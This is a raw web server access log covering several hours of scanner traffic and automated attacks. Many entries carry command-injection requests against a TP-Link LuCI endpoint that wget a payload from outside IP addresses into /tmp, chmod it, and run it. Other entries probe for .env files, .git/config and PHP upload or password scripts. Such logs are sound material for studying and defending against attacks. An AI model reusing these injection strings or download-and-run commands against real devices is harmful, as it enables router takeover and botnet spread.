185.224.128.43 - - [05/May/2024:01:34:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.38.111 - - [05/May/2024:01:37:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.255.167.250 - - [05/May/2024:01:38:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
141.255.167.250 - - [05/May/2024:01:40:38 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.43 - - [05/May/2024:01:44:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.240.205.34 - - [05/May/2024:01:46:53 +0200] "Gh0st\xad" 501 321 "-" "-"
146.19.24.28 - - [05/May/2024:01:48:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
146.19.24.28 - - [05/May/2024:01:50:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.255.167.250 - - [05/May/2024:01:52:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
167.94.145.110 - - [05/May/2024:01:53:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.110 - - [05/May/2024:01:53:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.110 - - [05/May/2024:01:53:57 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.110 - - [05/May/2024:01:53:57 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
146.19.24.28 - - [05/May/2024:01:55:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
157.230.19.125 - - [05/May/2024:01:58:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
157.230.19.125 - - [05/May/2024:01:58:58 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
195.1.144.109 - - [05/May/2024:01:59:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
146.19.24.28 - - [05/May/2024:02:01:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.92.246.162 - - [05/May/2024:02:03:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36"
146.19.24.28 - - [05/May/2024:02:04:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
146.19.24.28 - - [05/May/2024:02:04:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.80 - - [05/May/2024:02:08:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.80 - - [05/May/2024:02:08:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.16.38.111 - - [05/May/2024:02:10:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [05/May/2024:02:10:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.38.111 - - [05/May/2024:02:11:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [05/May/2024:02:15:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.255.167.250 - - [05/May/2024:02:16:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
146.19.24.28 - - [05/May/2024:02:18:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.128.232.213 - - [05/May/2024:02:23:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.128.232.213 - - [05/May/2024:02:23:40 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.128.232.213 - - [05/May/2024:02:23:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Edg/100.0.1185.44"
64.62.197.105 - - [05/May/2024:02:24:07 +0200] "\x16\x03\x01" 501 318 "-" "-"
184.105.247.195 - - [05/May/2024:02:24:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.105 - - [05/May/2024:02:30:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
141.255.167.250 - - [05/May/2024:02:33:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
194.165.16.10 - - [05/May/2024:02:33:45 +0200] "\x03" 501 316 "-" "-"
146.19.24.28 - - [05/May/2024:02:36:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
164.90.229.185 - - [05/May/2024:02:38:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.90.229.185 - - [05/May/2024:02:38:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
141.255.167.250 - - [05/May/2024:02:39:19 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
141.255.167.250 - - [05/May/2024:02:39:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
138.68.208.32 - - [05/May/2024:02:44:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
138.68.208.32 - - [05/May/2024:02:44:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
138.68.208.32 - - [05/May/2024:02:44:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
138.68.208.32 - - [05/May/2024:02:45:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
138.68.208.32 - - [05/May/2024:02:45:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
138.68.208.32 - - [05/May/2024:02:45:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
138.68.208.32 - - [05/May/2024:02:45:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
138.68.208.32 - - [05/May/2024:02:45:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
141.255.167.250 - - [05/May/2024:02:45:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
141.255.167.250 - - [05/May/2024:02:45:48 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
138.68.208.32 - - [05/May/2024:02:45:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
138.68.208.32 - - [05/May/2024:02:46:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.235.24.104 - - [05/May/2024:02:47:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.1.144.109 - - [05/May/2024:02:47:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
35.203.211.201 - - [05/May/2024:02:48:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.16.38.111 - - [05/May/2024:02:48:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.255.167.250 - - [05/May/2024:02:54:02 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
198.235.24.213 - - [05/May/2024:03:08:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.213 - - [05/May/2024:03:08:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
84.54.51.41 - - [05/May/2024:03:08:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
195.1.144.109 - - [05/May/2024:03:10:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
141.255.167.250 - - [05/May/2024:03:14:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
195.1.144.109 - - [05/May/2024:03:14:48 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
179.43.188.106 - - [05/May/2024:03:15:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
179.43.188.106 - - [05/May/2024:03:16:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.255.167.250 - - [05/May/2024:03:20:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
179.43.188.106 - - [05/May/2024:03:21:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.38.111 - - [05/May/2024:03:22:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
195.1.144.109 - - [05/May/2024:03:23:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.16.38.111 - - [05/May/2024:03:23:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
199.45.154.65 - - [05/May/2024:03:24:55 +0200] "\x16\x03\x01\x01\x0f\x01" 501 321 "-" "-"
179.43.188.106 - - [05/May/2024:03:27:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
81.91.173.172 - - [05/May/2024:03:29:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "DENIC-Crawler/42"
185.180.140.4 - - [05/May/2024:03:31:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.16.38.111 - - [05/May/2024:03:32:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
195.1.144.109 - - [05/May/2024:03:34:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
141.255.167.250 - - [05/May/2024:03:35:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
141.255.167.250 - - [05/May/2024:03:40:03 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
195.1.144.109 - - [05/May/2024:03:40:33 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
157.245.62.33 - - [05/May/2024:03:42:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
157.245.62.33 - - [05/May/2024:03:42:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
157.245.62.33 - - [05/May/2024:03:42:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.62.33 - - [05/May/2024:03:42:35 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
157.245.62.33 - - [05/May/2024:03:42:36 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
157.245.62.33 - - [05/May/2024:03:42:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
157.245.62.33 - - [05/May/2024:03:42:38 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.62.33 - - [05/May/2024:03:42:40 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.62.33 - - [05/May/2024:03:42:40 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.62.33 - - [05/May/2024:03:42:41 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.62.33 - - [05/May/2024:03:42:41 +0200] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.62.33 - - [05/May/2024:03:42:42 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.62.33 - - [05/May/2024:03:42:43 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.62.33 - - [05/May/2024:03:42:43 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
141.255.167.250 - - [05/May/2024:03:43:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+wget+http%3A%2F%2F38.45.200.163%2Fsh+%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.180.140.5 - - [05/May/2024:03:47:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.224.128.43 - - [05/May/2024:03:49:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
146.19.24.28 - - [05/May/2024:03:54:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
146.19.24.28 - - [05/May/2024:03:55:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
146.19.24.28 - - [05/May/2024:03:55:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.38.111 - - [05/May/2024:03:55:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [05/May/2024:03:55:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
146.19.24.28 - - [05/May/2024:03:55:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [05/May/2024:03:57:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.62.197.61 - - [05/May/2024:03:58:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
198.235.24.11 - - [05/May/2024:03:59:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.16.38.111 - - [05/May/2024:03:59:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.43 - - [05/May/2024:04:00:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.62.197.58 - - [05/May/2024:04:00:40 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36"
34.140.108.54 - - [05/May/2024:04:00:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
91.92.248.48 - - [05/May/2024:04:00:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
91.92.248.48 - - [05/May/2024:04:00:44 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.62.197.50 - - [05/May/2024:04:01:09 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
34.22.213.78 - - [05/May/2024:04:04:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
146.19.24.28 - - [05/May/2024:04:05:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
78.153.140.179 - - [05/May/2024:04:07:00 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.179 - - [05/May/2024:04:07:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.111.8 - - [05/May/2024:04:09:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.227.111.8 - - [05/May/2024:04:09:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 9; moto g(6)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
146.19.24.28 - - [05/May/2024:04:14:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "POST /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "GET /.env.prod HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "POST /.env.prod HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "GET /.env.production HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "POST /.env.production HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "GET /redmine/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "POST /redmine/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "GET /__tests__/test-become/.env HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "POST /__tests__/test-become/.env HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
191.96.207.173 - - [05/May/2024:04:15:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0"
